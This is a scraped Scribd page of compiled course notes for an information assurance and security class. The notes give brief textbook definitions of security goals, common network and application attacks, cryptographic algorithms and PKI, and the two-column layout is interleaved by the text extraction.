0% found this document useful (0 votes)
19 views3 pages

IAS 2 (Compiled Notes)

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
19 views3 pages

IAS 2 (Compiled Notes)

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

IAS 2 • Unauthorized Access: Access without permission by

a rightful owner of devices or networks.


Types of Security • Impersonation, Worms, Viruses.
➢ Computer Security: A generic term for the collection
of tools designed to protect data and thwart hackers. Risk Management vs. Cost of Security
➢ Network Security: Measures to protect data during
transmission. ▪ Risk Mitigation: The process of selecting appropriate
➢ Internet Security: Measures to protect data during controls to reduce risk to an acceptable level.
transmission over interconnected networks. ▪ Level of Acceptable Risk: Determined by comparing
the risk of security hole exposure to the cost of
Goals of Security (CIA) implementing and enforcing security policy.
▪ Assess the cost of certain losses and avoid spending
✓ Confidentiality: Prevents unauthorized use or more to protect something than it is worth.
disclosure of information. ▪
✓ Integrity: Safeguards the accuracy and completeness Attack Sources
of information.
✓ Availability: Ensures authorized users have reliable • Active vs. Passive:
and timely access to information.
o Active: Writing data to the network, often
disguising one’s address.
Terminology o Passive: Reading data on the network,
breaching confidentiality.
Access Control: Ability to permit or deny the use of an object
by a subject. It provides three essential services: • On-Path vs. Off-Path:

❖ Identification and Authentication: Who can log in. o On-Path: Routers can read, modify, or remove
❖ Authorization: What authorized users can do. any transmitted datagram.
❖ Accountability: Identifies what a user did. o Off-Path: Hosts can send datagrams appearing
to come from other hosts but cannot receive
AAA datagrams meant for them.
• Insider vs. Outsider: Definition of perimeter/border.
Authentication
Authorization • Deliberate Attack vs. Unintentional Event:
Accountability Configuration errors and software bugs can be as
harmful as deliberate attacks.
Authentication - Validating a claimed identity of an end user
or a device (e.g., host, server, switch, router). Must differentiate Security Aims
between user, device, or application authentication.
✓ Controlling data/network access.
Authorization - Granting access rights to a user, groups of ✓ Preventing intrusions.
users, system, or program, typically done in conjunction with ✓ Responding to incidents.
authentication. ✓ Ensuring network availability.
✓ Protecting information in transit.
Non-Repudiation - A property of a cryptographic system Security Services
preventing a sender from denying later that they sent a
message or performed a certain action. ❖ Authentication
❖ Authorization
Audit - A chronological record of system activities enabling the ❖ Access Control
reconstruction and examination of a sequence of events. ❖ Data Integrity
❖ Data Confidentiality
Vulnerability - A weakness in security procedures, network ❖ Auditing/Logging
design, or implementation that can be exploited to violate a ❖ DoS Mitigation
corporate security policy, such as:
Layer 2 Attacks
✓ Software bugs
✓ Configuration mistakes ▪ ARP Spoofing
✓ Network design flaws ▪ MAC Attacks
▪ DHCP Attacks
Exploit - Taking advantage of a vulnerability. ▪ VLAN Hopping
Risk - The possibility that a vulnerability will be exploited. MAC Flooding
✓ Risk Analysis: The process of identifying security Exploits the limitation of switches – fixed CAM table
risks, determining their impact, and identifying areas size.
requiring protection. CAM (Content Addressable Memory): Stores
Threat - Any circumstance or event with the potential to cause mapping of individual MAC addresses to physical
harm to a networked system, such as: ports on the switch.

• Denial of Service (DoS): Attacks that make VLAN Hopping


resources unavailable to intended users.
• An attack on a network with multiple VLANs.
• Two Primary Methods: ➢ Enables attackers to inject scripts into webpages
o Switch Spoofing: Attacker initiates a trunking viewed by others.
switch. ➢ Types:
o Double Tagging: Packet is tagged twice. o Persistent XSS: More devastating.
o Non-persistent XSS: More common.
o Example: BeEF (Browser Exploitation
DHCP Attacks Framework).
➢ DHCP Starvation Attack: Broadcasting numerous
DHCP requests with spoofed MAC addresses SQL Injection - A subset of unverified user input vulnerability
simultaneously. that injects malicious code into SQL queries, executed when
➢ Rogue DHCP Server Attacks. passed to the SQL server.

DNS Cache Poisoning - Caching incorrect resource records


Layer 3 Attacks from unauthorized sources, redirecting connections (web,
email, network) to a target controlled by the attacker.
• ICMP Ping Flood
• ICMP Smurf Common Types of Attacks
• Ping of Death
❖ Man-in-the-Middle Attack: Intercepts messages
intended for a valid device.
TCP Attacks ❖ Ping sweeps and port scans.
❖ Hijacking and Spoofing: Setting up a fake device to
• SYN Flood: An attacker sends SYN requests in trick others into sending messages.
succession, causing the host to retain bogus half- ❖ Sniffing: Capturing packets as they travel through the
connections, exhausting resources for new legitimate network.
connections. ❖ DoS and DDoS.

Routing Attacks
Wireless Attacks
➢ Attempt to poison routing information.
➢ Distance Vector Routing: Announces zero distance WEP: The first security mechanism for 802.11
to all nodes, causing blackhole traffic and wireless networks, vulnerable to "FMS attacks"
eavesdropping. discovered by Fluhrer, Mantin, and Shamir.
➢ Link State Routing: Can randomly drop links or claim
direct links to other routers. Man-in-the-Middle Attacks (Wireless) - Creates a fake
➢ BGP Attacks: ASes can announce arbitrary prefixes access point for clients to authenticate, capturing traffic to see
or alter paths. usernames, passwords, etc., sent in clear text.

Cryptography - Has evolved into a complex science in the


Application Layer Attacks field of information security.

▪ Applications that don’t authenticate properly. What is Cryptography?


▪ Authentication Information in Clear: Vulnerabilities
in protocols like FTP, Telnet, and POP. Part of a field of study known as cryptology, which includes:
▪ DNS Insecurity: Includes DNS poisoning and DNS
▪ Cryptography: Study of methods for secret writing,
zone transfer.
transforming messages into unintelligible form, and
recovering messages using some secret knowledge
Common Types of Application Layer Attacks (key).
▪ Cryptanalysis: Analysis of cryptographic systems,
❖ Scripting vulnerabilities inputs, and outputs to derive confidential information.
❖ Cookie poisoning
❖ Buffer overflow
❖ Hidden field manipulation Key Concepts in Cryptography
❖ Parameter tampering
✓ Encryption: Process of transforming plaintext to
❖ Cross-Site Scripting (XSS)
ciphertext using a cryptographic key.
❖ SQL Injection
✓ Symmetric Key Cryptography: Uses a single key for
both encryption and decryption (also known as private
Server-Side Scripting key).
✓ Asymmetric Key Cryptography: Uses separate keys
• Programs executed on the server rather than the for encryption and decryption (public and private key
user's browser (e.g., ASP.NET, PHP, mod_perl, CGI, pairs).
Ruby, Python). ✓
• Benefits: Cross-platform, no plugin required. Terminology of Cryptography
• Disadvantages: Dynamic scripts create security
concerns, exploiting code flaws. • Cipher: Cryptographic technique (algorithm) applying
a secret transformation to messages.
• Plaintext/Cleartext: Original message or data.
Cross-Site Scripting (XSS) • Ciphertext: Unintelligible encrypted plaintext.
• Decryption: Transforming ciphertext back into original By combining one’s private key and the other’s public
plaintext. key, both parties can compute the same shared secret
• Cryptographic Key: Secret knowledge used by a number.
cipher to encrypt or decrypt a message.
DH Man-in-the-Middle Attack - Diffie-Hellman is subject to a
man-in-the-middle attack. Digital signatures of the ‘public
Symmetric Key Algorithm values’ can enable each party to verify the authenticity of the
generated value.
➢ Stream Ciphers: Encrypt bits of the message one at
a time. Trusted Network
➢ Block Ciphers: Takes a block of bits and encrypts
them as a single unit. • Standard defensive-oriented technologies:

o Firewall
Digital Signatures - Sender encrypts the message with their o Intrusion Detection
own private key instead of the intended receiver’s public key. • Build trust on top of the TCP/IP infrastructure:
Message Digests - Produces a condensed representation of a o Strong authentication
message (hashing). o Public Key Infrastructure (PKI)
Strong Authentication
Secret Key Algorithms
• An absolute requirement involving:
• DES (Data Encryption Standard):
o Two-factor authentication (something you
o Block cipher using shared key encryption know and something you have).
(56-bit).
o Developed by IBM for the US government in • Examples: Passwords, Tokens, Tickets, Restricted
1973-1974, approved in Nov 1976. access, PINs, Biometrics, Certificates
o Block size: 64 bits.
• 3DES (Triple DES): Public Key Infrastructure (PKI)

o Applies DES three times to each data block • A framework that builds the network of trust.
using a key bundle (K1, K2, K3) of 56 bits
each (excluding parity). • Combines public key cryptography and digital
o Disadvantage: Very slow. signatures to ensure:
• AES (Advanced Encryption Standard):
o Confidentiality
o Published in November 2001 as a o Integrity
replacement for DES. o Authentication
o Symmetric block cipher with a fixed block o Non-repudiation
size of 128 bits and key sizes of 128, 192, or o Access control
256 bits. • Protects applications that require a high level of
o Based on Rijndael cipher developed by Joan security.
Daemen and Vincent Rijmen.
PKI Components
Hash Functions - A hash function takes an input message of
arbitrary length and outputs a fixed-length code, called the ➢ Certificate Authority (CA): A trusted third party.
hash or message digest. ➢ Registration Authority (RA): Binds keys to users.
➢ Validation Authority (VA): Validates user identities.
Uses of Hashing Digital Certificates

o Verifying file integrity: If the hash changes, the data is ✓ Basic element of PKI; secure credential that identifies
either compromised or altered in transit. the owner (also called a public key certificate).
o Digitally signing documents. ✓ Addresses binding a public key to an entity, which is
o Hashing passwords. crucial for eCommerce.
Components of a Digital Certificate

Common Hash Functions • User’s public key.


• User’s ID.
❖ MD5: Outputs a 128-bit fingerprint of an arbitrary- • Additional information (e.g., validity period).
length input. • Examples: X.509 (standard), PGP (Pretty Good
❖ SHA-1: Outputs a 160-bit message digest, widely Privacy).
used in security applications (TLS, SSL, PGP, SSH, X.509
S/MIME, IPsec).
➢ An ITU-T standard for a public key infrastructure for
single sign-on and Privilege Management
Diffie-Hellman Infrastructure (PMI).
➢ Assumes a strict hierarchical system of Certificate
Protocol: Requires both sender and recipient to have
Authorities (CAs).
key pairs.

You might also like